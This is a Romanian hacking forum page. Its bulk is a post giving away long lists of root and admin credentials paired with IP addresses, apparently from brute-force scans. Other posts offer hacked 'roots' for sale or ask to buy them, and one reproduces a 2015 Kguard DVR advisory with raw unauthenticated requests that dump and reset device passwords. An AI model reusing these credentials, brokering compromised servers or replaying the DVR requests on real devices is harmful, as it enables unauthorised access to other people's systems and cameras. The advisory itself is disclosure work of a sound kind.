->root:password:67.252.145.78 DUP L-amPrins... !! ->root:password:67.252.145.92 DUP L-amPrins... !! ->root:password:67.252.145.68 DUP L-amPrins... !! ->root:password:67.252.158.12 DUP L-amPrins... !! ->root:password:67.252.146.108 L-amPrins... !! ->root:r00t123:67.252.169.67 DUP L-amPrins... !! ->root:password:67.252.154.219 DUP L-amPrins... !! ->root:password:67.252.151.132 L-amPrins... !! ->root:r00t123:67.252.174.137 DUP L-amPrins... !! ->root:password:67.252.162.10 DUP L-amPrins... !! ->root:password:67.252.150.245 L-amPrins... !! ->root:r00t123:67.252.174.152 L-amPrins... !! ->root:r00t123:67.252.174.136 L-amPrins... !! ->root:r00t123:67.252.174.182 DUP L-amPrins... !! ->root:password:67.252.162.68 L-amPrins... !! ->root:r00t123:67.252.177.168 DUP L-amPrins... !! ->root:password:67.252.163.66 L-amPrins... !! ->root:r00t123:67.252.183.132 L-amPrins... !! ->root:r00t123:67.252.184.200 DUP L-amPrins... !! ->root:111111:67.252.144.151 L-amPrins... !! ->root:r00t123:67.252.180.152 L-amPrins... !! ->root:r00t123:67.252.183.182 L-amPrins... !! ->root:r00t123:67.252.186.73 L-amPrins... !! ->root:r00t123:67.252.186.12 L-amPrins... !! ->root:r00t123:67.252.186.72 L-amPrins... !! ->root:r00t123:67.252.186.74 L-amPrins... !! ->root:r00t123:67.252.187.2 L-amPrins... !! ->root:r00t123:67.252.186.87 L-amPrins... !! ->root:r00t123:67.252.187.150 L-amPrins... !! ->root:r00t123:67.252.188.236 DUP L-amPrins... !! ->root:password:67.252.170.55 DUP L-amPrins... !! ->root:111111:67.252.145.78 L-amPrins... !! ->root:r00t123:67.252.188.156 DUP L-amPrins... !! ->root:111111:67.252.145.92 L-amPrins... !! ->root:r00t123:67.252.187.172 L-amPrins... !! ->root:r00t123:67.252.190.172 DUP L-amPrins... !! ->root:111111:67.252.146.108 DUP L-amPrins... !! ->root:111111:67.252.154.219 DUP L-amPrins... !! ->root:password:67.252.174.137 DUP L-amPrins... !! ->root:111111:67.252.151.132 DUP L-amPrins... !! ->root:password:67.252.169.67 DUP L-amPrins... !! ->root:password:67.252.174.136 DUP L-amPrins... !! ->root:password:67.252.174.152 DUP L-amPrins... !! ->root:111111:67.252.150.245 DUP L-amPrins... !! ->root:password:67.252.174.182 L-amPrins... !! ->root:r00t123:67.254.15.219 L-amPrins... !! ->root:r00t123:67.254.24.67 L-amPrins... !! ->root:r00t123:67.254.37.197 L-amPrins... !! ->root:r00t123:67.254.20.208 DUP L-amPrins... !! ->root:111111:67.252.162.68 DUP L-amPrins... !! ->root:password:67.252.177.168 DUP L-amPrins... !! ->root:111111:67.252.163.66 L-amPrins... !! ->root:r00t123:67.254.43.151 DUP L-amPrins... !! ->root:password:67.252.184.200 DUP L-amPrins... !! ->root:password:67.252.183.132 DUP L-amPrins... !! ->root:password:67.252.180.152 DUP L-amPrins... !! ->root:password:67.252.183.182 DUP L-amPrins... !! ->root:password:67.252.186.72 DUP L-amPrins... !! ->root:123456:67.252.144.151 DUP L-amPrins... !! ->root:password:67.252.186.74 L-amPrins... !! ->root:r00t123:67.254.48.206 DUP L-amPrins... !! ->root:password:67.252.187.2 L-amPrins... !! ->root:r00t123:67.254.49.167 L-amPrins... !! ->root:r00t123:67.254.56.9 DUP L-amPrins... !! ->root:password:67.252.188.236 DUP L-amPrins... !! ->root:password:67.252.186.73 DUP L-amPrins... !! ->root:123456:67.252.145.78 DUP L-amPrins... !! ->root:password:67.252.186.12 L-amPrins... !! ->root:r00t123:67.254.49.198 DUP L-amPrins... !! ->root:password:67.252.187.150 DUP L-amPrins... !! ->root:111111:67.252.170.55 DUP L-amPrins... !! ->root:password:67.252.187.172 DUP L-amPrins... !! ->root:123456:67.252.145.92 DUP L-amPrins... !! ->root:password:67.252.190.172 DUP L-amPrins... !! ->root:123456:67.252.146.108 DUP L-amPrins... !! ->root:password:67.252.188.156 L-amPrins... !! ->root:r00t123:67.254.63.205 DUP L-amPrins... !! ->root:111111:67.252.174.137 L-amPrins... !! ->root:r00t123:67.254.60.179 DUP L-amPrins... !! ->root:123456:67.252.151.132 DUP L-amPrins... !! ->root:111111:67.252.169.67 DUP L-amPrins... !! ->root:123456:67.252.154.219 DUP L-amPrins... !! ->root:111111:67.252.174.136 DUP L-amPrins... !! ->root:111111:67.252.174.152 DUP L-amPrins... !! ->root:password:67.254.15.219 DUP L-amPrins... !! ->root:111111:67.252.174.182 DUP L-amPrins... !! ->root:password:67.254.24.67 DUP L-amPrins... !! ->root:123456:67.252.150.245 DUP L-amPrins... !! ->root:password:67.254.20.208 DUP L-amPrins... !! ->root:password:67.254.37.197 DUP L-amPrins... !! ->root:123456:67.252.163.66 L-amPrins... !! ->root:r00t123:67.49.161.163 L-amPrins... !! ->root:r00t123:67.49.163.126 L-amPrins... !! ->root:r00t123:67.49.160.34 L-amPrins... !! ->root:r00t123:67.49.167.41 L-amPrins... !! ->root:r00t123:67.49.166.198 L-amPrins... !! ->root:r00t123:67.49.167.35 DUP L-amPrins... !! ->root:123456:67.252.162.68 DUP L-amPrins... !! ->root:password:67.254.43.151 DUP L-amPrins... !! ->root:111111:67.252.183.182 DUP L-amPrins... !! ->root:password:67.254.48.206 L-amPrins... !! ->root:r00t123:67.49.168.105 DUP L-amPrins... !! ->root:111111:67.252.177.168 DUP L-amPrins... !! ->root:111111:67.252.184.200 DUP L-amPrins... !! ->root:password:67.254.49.167 DUP L-amPrins... !! ->root:password:67.254.56.9 DUP L-amPrins... !! ->root:111111:67.252.187.2 DUP L-amPrins... !! ->root:111111:67.252.180.152 DUP L-amPrins... !! ->root:111111:67.252.186.74 DUP L-amPrins... !! ->root:111111:67.252.183.132 DUP L-amPrins... !! ->root:111111:67.252.188.236 DUP L-amPrins... !! ->root:123456:67.252.170.55 DUP L-amPrins... !! ->root:111111:67.252.190.172 DUP L-amPrins... !! ->root:111111:67.252.187.150 DUP L-amPrins... !! ->root:password:67.254.63.205 DUP L-amPrins... !! ->root:111111:67.252.188.156 L-amPrins... !! ->root:r00t123:67.49.175.130 DUP L-amPrins... !! ->root:111111:67.252.187.172 DUP L-amPrins... !! ->root:password:67.254.60.179 L-amPrins... !! ->root:r00t123:67.49.175.141 DUP L-amPrins... !! ->root:123456:67.252.169.67 DUP L-amPrins... !! ->root:123456:67.252.174.182 DUP L-amPrins... !! ->root:123456:67.252.174.152 DUP L-amPrins... !! ->root:123456:67.252.174.136 DUP L-amPrins... !! ->root:111111:67.254.15.219 DUP L-amPrins... !! ->root:111111:67.254.37.197 DUP L-amPrins... !! ->root:111111:67.254.24.67 DUP L-amPrins... !! ->root:111111:67.254.20.208 DUP L-amPrins... !! ->root:111111:67.254.43.151 DUP L-amPrins... !! ->root:111111:67.254.48.206 DUP L-amPrins... !! ->root:password:67.49.166.198 DUP L-amPrins... !! ->root:password:67.49.161.163 DUP L-amPrins... !! ->root:123456:67.252.183.182 DUP L-amPrins... !! ->root:111111:67.254.49.167 DUP L-amPrins... !! ->root:password:67.49.167.35 DUP L-amPrins... !! ->root:111111:67.254.56.9 DUP L-amPrins... !! ->root:123456:67.252.177.168 DUP L-amPrins... !! ->root:123456:67.252.184.200 DUP L-amPrins... !! ->root:123456:67.252.186.74 DUP L-amPrins... !! ->root:123456:67.252.187.2 DUP L-amPrins... !! ->root:123456:67.252.190.172 DUP L-amPrins... !! ->root:123456:67.252.180.152 DUP L-amPrins... !! ->root:123456:67.252.188.156 DUP L-amPrins... !! ->root:123456:67.252.187.150 DUP L-amPrins... !! ->root:123456:67.252.183.132 DUP L-amPrins... !! ->root:password:67.49.175.130 DUP L-amPrins... !! ->root:111111:67.254.60.179 DUP L-amPrins... !! ->root:123456:67.252.187.172 DUP L-amPrins... !! ->root:123456:67.254.15.219 DUP L-amPrins... !! ->root:123456:67.254.37.197 DUP L-amPrins... !! ->root:123456:67.254.43.151 DUP L-amPrins... !! ->root:123456:67.254.24.67 DUP L-amPrins... !! ->root:123456:67.254.49.167 DUP L-amPrins... !! ->root:123456:67.254.48.206 DUP L-amPrins... !! ->root:123456:67.254.20.208 DUP L-amPrins... !! ->root:111111:67.49.166.198 DUP L-amPrins... !! ->root:111111:67.49.161.163 DUP L-amPrins... !! ->root:111111:67.49.167.35 SPD'S NEXT ROOT ->admin:admin:178.124.176.16 DUP SPD'S NEXT ROOT ->admin:admin123:178.124.176.16 SPD'S NEXT ROOT ->admin:admin:177.17.60.233 SPD'S NEXT ROOT ->root:root:178.157.15.160 SPD'S NEXT ROOT ->admin:admin:186.46.2.122 DUP SPD'S NEXT ROOT ->admin:root:178.124.176.16 SPD'S NEXT ROOT ->admin:admin:186.235.138.217 DUP SPD'S NEXT ROOT ->admin:administrator:178.124.176.16 SPD'S NEXT ROOT ->admin:admin:177.105.231.253 DUP SPD'S NEXT ROOT ->admin:12345:178.124.176.16 DUP SPD'S NEXT ROOT ->admin:123456:178.124.176.16 DUP SPD'S NEXT ROOT ->admin:admin123:177.17.60.233 DUP SPD'S NEXT ROOT ->admin:password:178.124.176.16 DUP SPD'S NEXT ROOT ->admin:root:177.17.60.233 DUP SPD'S NEXT ROOT ->admin:admin123:177.105.231.253 DUP SPD'S NEXT ROOT ->admin:administrator:177.17.60.233 SPD'S NEXT ROOT ->root:admin:121.128.135.74 DUP SPD'S NEXT ROOT ->root:admin:121.128.135.74 SPD'S NEXT ROOT ->root:admin:177.64.125.196 DUP SPD'S NEXT ROOT ->admin:12345:177.17.60.233 DUP SPD'S NEXT ROOT ->admin:123456:177.17.60.233 SPD'S NEXT ROOT ->user:user:178.39.13.179 DUP SPD'S NEXT ROOT ->admin:password:177.17.60.233 Asta este al 2-lea thread(retard dupa cum spusese cineva) pe care il deschid in sectiunea FREE STUFF (Unde, in regulament nu specifica ca este interzis sa furnizez CONTURI.) Cu respect, SirAlx
  20. 1K Like 10$ Root 6$ /b Pentru mai multe informati , ma puteti contacta in PM sau pe YM si ICQ ! BTC/PM/WMZ
  21. Rog frumos cine imi da si mie un root ?
  22. MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS, February 10, 2015 PRODUCT DESCRIPTION The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical application. It's stylish & streamlines hardware design and excellent performance can be fast moving, competitive and an ideal solution for entry level & distribution channels. VENDOR REFERENCE: http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527 VULNERABILITY DESCRIPTION 1. Insufficient authentication and authorization A deficiency in handling authentication and authorization has been found with Kguard 104/108 models. While password-based authentication is used by the ActiveX component to protect the login page, all the communication to the application server at port 9000 allows data to be communicated directly with insufficient or improper authorization. The request HI_SRDK_SYS_USERMNG_GetUserList for example will show all the usernames in the system together with their passwords. The below example is an actual unmodified request and response by the server. REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0 CSeq:6 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:51 3Segment-Num:1 Segment-Seq:1 Data-Length:4 VMCTP/1.0 200 OK Content-Type:text/HDP CSeq:6 Return-Code:0 Content-Length:2326 Segment-Num:2 Segment-Seq:1 Data-Length:2240 eric 111222 111222 admin 111222 111222 333444 333444 555666 555666 user4 user5 user6 Segment-Seq:2 Data-Length:4 An interesting request is HI_SRDK_NET_MOBILE_GetOwspAttr. If configured, this allows mobile devices to access and monitor the cameras at port 18004. An actual unmodified request and response is shown below. REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0 CSeq:15 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:15 Segment-Num:0 VMCTP/1.0 200 OK Content-Type:text/HDP CSeq:15 Return-Code:0 Content-Length:161 Segment-Num:1 Segment-Seq:1 Data-Length:112 admin 111222 The password to this user can be changed easily by executing the HI_SRDK_NET_MOBILE_SetOwspAttr request as shown below and can be saved in memory by executing HI_SRDK_DEV_SaveFlash: REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0 CSeq:1 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:161 Segment-Num:1 Segment-Seq:1 Data-Length:112 admin.t..|A<.......n(...........111222444.eted!.p.c<.... ... ...TF.............................................. The logs from the application server can confirm that the execution was successful: [MCTP] [HI_MCTP_MethodProc_Remote] SUCCESS!!!!! /home/yala/svn/D9108_MLANG_QSEE/dvr/modules/vscp/mctp/server/hi_vscp_mctp_mthdproc.c 606======================== GetNetworkState:192.168.254.200 Logs from the DVR also shows that an existing mobile device that tries to connect on port 18004 with previous credentials stored will fail: < StreamingServer> [ run] A client(116) connected[2010-09-11 12:30]. < LangtaoCommProto> [ handlePacketBody] Input buffer total length: 60 < LangtaoCommProto> [ handlePacketBody] tlv type: 41 < LangtaoCommProto> [ handlePacketBody] tlv length: 56 < LangtaoCommProto> [ handlePacketBody] Login request received. < LangtaoCommProto> [ handleLoginReq] User Name: admin Passwrod: 111222 < LangtaoCommProto> [ handleLoginReq] User name and/or password validate fail. < StreamingServer> [ handleRequest2] Send response to client. < StreamingServer> [ handleRequest2] Session closed actively. < StreamingServer> [ run] Handle request fail. ----------------------- SESSION(116) END ----------------------- 2. Lack of transport security The communication to the application server is done by an unprotected ActiveX component that is presented to the browser's initial session. The lack of transport encryption may allow us to exploit possible request from this component to the application server. This file is named as HiDvrOcx.cab. Decompiling the file will allow us to see the libraries being used: -rw-rw-r--. 1 fjpfajardo fjpfajardo 1443576 Mar 11 2011 HiDvrOcx.ocx -rw-rw-r--. 1 fjpfajardo fjpfajardo 1443 Mar 11 2011 HiDvrOcx.inf -rw-rw-r--. 1 fjpfajardo fjpfajardo 27136 Mar 11 2011 HiDvrOcxESN.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxITA.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxBRG.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 20992 Mar 11 2011 HiDvrOcxJPN.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 155648 Mar 11 2011 HiDvrNet.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 487525 Mar 11 2011 HiDvrMedia.dll Interestingly, checking the DLL file named HiDvrNet.dll will reveal other types of controls which can be presented to the application server as well: HI_SRDK_NET_MOBILE_GetOwspAttr HI_SRDK_NET_MOBILE_SetAttr HI_SRDK_NET_MOBILE_SetOwspAttr HI_SRDK_NET_Network_DHCP_Client_GetAttr HI_SRDK_NET_Network_DHCP_Client_SetAttr HI_SRDK_NET_Network_GetDNSList HI_SRDK_NET_Network_GetDefaultGateway HI_SRDK_NET_Network_GetNetdevAttr HI_SRDK_NET_Network_GetNetdevName HI_SRDK_NET_Network_SetDNSList HI_SRDK_NET_Network_SetDefaultGateway HI_SRDK_NET_Network_SetNetdevAttr HI_SRDK_NET_SetDdnsAttr HI_SRDK_NET_SetEmailAttr HI_SRDK_NET_SetIppreviewVodAttr HI_SRDK_NET_SetMctpServerPort HI_SRDK_NET_SetPppoeAttr HI_SRDK_NET_SetWebServerPort HI_SRDK_Open_Device HI_SRDK_RECORDER_GetPlaybackAttr HI_SRDK_RECORDER_GetRecordAttr HI_SRDK_RECORDER_GetRecordSchedule HI_SRDK_RECORDER_SetPlaybackAttr HI_SRDK_RECORDER_SetRecordAttr HI_SRDK_RECORDER_SetRecordSchedule HI_SRDK_SYS_GetDaylightAttr HI_SRDK_SYS_GetSysMaintainAttr HI_SRDK_SYS_GetSystemAttr HI_SRDK_SYS_SetDaylightAttr HI_SRDK_SYS_SetSysMaintainAttr HI_SRDK_SYS_SetSystemAttr HI_SRDK_SYS_USERMNG_AddGroup HI_SRDK_SYS_USERMNG_AddUser HI_SRDK_SYS_USERMNG_DelGroup HI_SRDK_SYS_USERMNG_DelUser HI_SRDK_SYS_USERMNG_Disable HI_SRDK_SYS_USERMNG_Enable HI_SRDK_SYS_USERMNG_GetAuthorityList HI_SRDK_SYS_USERMNG_GetGroupList HI_SRDK_SYS_USERMNG_GetUserList HI_SRDK_SYS_USERMNG_ModifyGroupInfo HI_SRDK_SYS_USERMNG_ModifyUserInfo 3. Denial of Service and Command Injection Input are not sanitized and filtered in some of the fields which may lead to a potential passive Denial of Service and/or command injection. By altering some requests such as HI_SRDK_NET_SetPppoeAttr, HI_SRDK_NET_Network_DHCP_Client_SetAttr, HI_SRDK_NET_SetWebServerPort or HI_SRDK_NET_Network_SetDefaultGateway, a malicous user may be able to disrupt connectivity to the DVR. REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0 CSeq:58 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:49 1Segment-Num:1 Segment-Seq:1 Data-Length:2 REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0 CSeq:61 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:15 Segment-Num:0 The application server that listens for incoming requests at port 9000 is run by a binary called raysharp_dvr which suggest that the hardware manufacturer is Zhuhai RaySharp Technology Co. While the purpose for this vulnerability analysis is mainly for Kguard related DVR's, I believe that other devices that use the same firmware by the manufacturer and rebranded in the market are also vulnerable. 576 root 20696 S ./raysharp_dvr 577 root 20696 S ./raysharp_dvr 578 root 20696 S ./raysharp_dvr 579 root 20696 S ./raysharp_dvr 580 root 20696 S ./raysharp_dvr 581 root 20696 S ./raysharp_dvr 582 root 20696 S ./raysharp_dvr Timeline: 02/07/2015 - Discovery / PoC 02/09/2015 - Reported to vendor (NR) Source
  23. Mai vinde cineva root de scan? Nu root care pica dupa 2 ore de scan! Daca mai are cineva astept pm
  24. Guest

    Ajutor Root

    Buna seara. Vreau sa imi cumpar un root si din cate am inteles imi trebuie un sniff de unde pot face rost de el etc. care ma poate ajuta sa imi lase in PM un id mess/skype va rog frumos ps: sunt incepator si as vrea sa invat va rog nu injurati si chesti din astea. Multumesc
  25. Salut, as dori si eu un root de scan,curat (fara alte lucruri adaugate, gen drop, redirect si etc) as putea sa dau la schimb cont filelist, czteam, scenefz cu ratie buna; Multumesc anticipat
×
×
  • Create New...